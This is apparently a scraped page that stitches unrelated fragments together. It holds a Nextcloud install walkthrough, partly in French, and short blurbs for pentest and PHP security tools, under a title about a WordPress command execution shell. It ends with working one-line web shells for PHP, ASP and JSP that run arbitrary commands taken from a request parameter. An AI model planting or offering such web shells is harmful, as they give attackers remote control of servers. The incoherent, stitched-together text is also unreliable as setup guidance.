Quick & dirty Wordpress Command Execution Shell
Just another vulnerable web application.
apt install apache2 php7.3 mariadb-server php7.3-mbstring php7.3-curl php7.3-dom php7.3-gd php7.3-zip php7.3-bz2 php7.3-intl php7.3-memcached php7.3-imagick php7.3-mysql
mysql_secure_installation
nano /etc/apache2/sites-available/nextcloud.conf
Alias /nextcloud "/var/www/html/"
<Directory /var/www/html/>
Require all granted
AllowOverride All
Options FollowSymLinks MultiViews
<IfModule mod_dav.c>
Dav off
</IfModule>
</Directory>
a2ensite nextcloud.conf
a2enmod rewrite
a2enmod headers
a2enmod env
a2enmod dir
a2enmod mime
systemctl restart apache2
a2enmod ssl
a2ensite default-ssl
service apache2 reload
https://download.nextcloud.com/server/releases/nextcloud-19.0.0.zip
unzip nextcloud-19.0.0.zip -d /var/www/html/
chown -R www-data:www-data /var/www/html/
mysql -u root -p
CREATE DATABASE database;
CREATE USER <A href="/cdn-cgi/l/email-protection" class="cf_email" data-cfemail="0e7b7d6b7c4e62616d6f6266617d7a">[email protected]</A> IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON database.* TO <A href="/cdn-cgi/l/email-protection" class="cf_email" data-cfemail="b1c4c2d4c3f1ddded2d0ddd9dec2c5">[email protected]</A>;
FLUSH PRIVILEGES;
Ouvrer votre navigateur et aller sur la page de votre site
A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).
PHP Static Analysis Tool - discover bugs in your code without running it!
Basic script to detect vulnerabilities into a PHP source code using statical analysis, based on regex
esser Known Web Attack Lab is for intermediate pentester that can test and practice lesser known web attacks such as Object Injection, XSSI, PHAR Deserialization, variables variable ..etc.
AMWSCAN (Antimalware Scanner) is a php antimalware/antivirus scanner console script written in php for scan your project. This can work on php projects and a lot of others platform.
Simple script to import/export CSV files in PHP
Quelques graphiques permettant de trouver les vulnérabilités affectant PHP, PHPmyadmin, js etc;.
PHP :
<? echo passthru($_GET['cmd']); ?>
ASP :
<% eval request("cmd") %>
JSP :
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>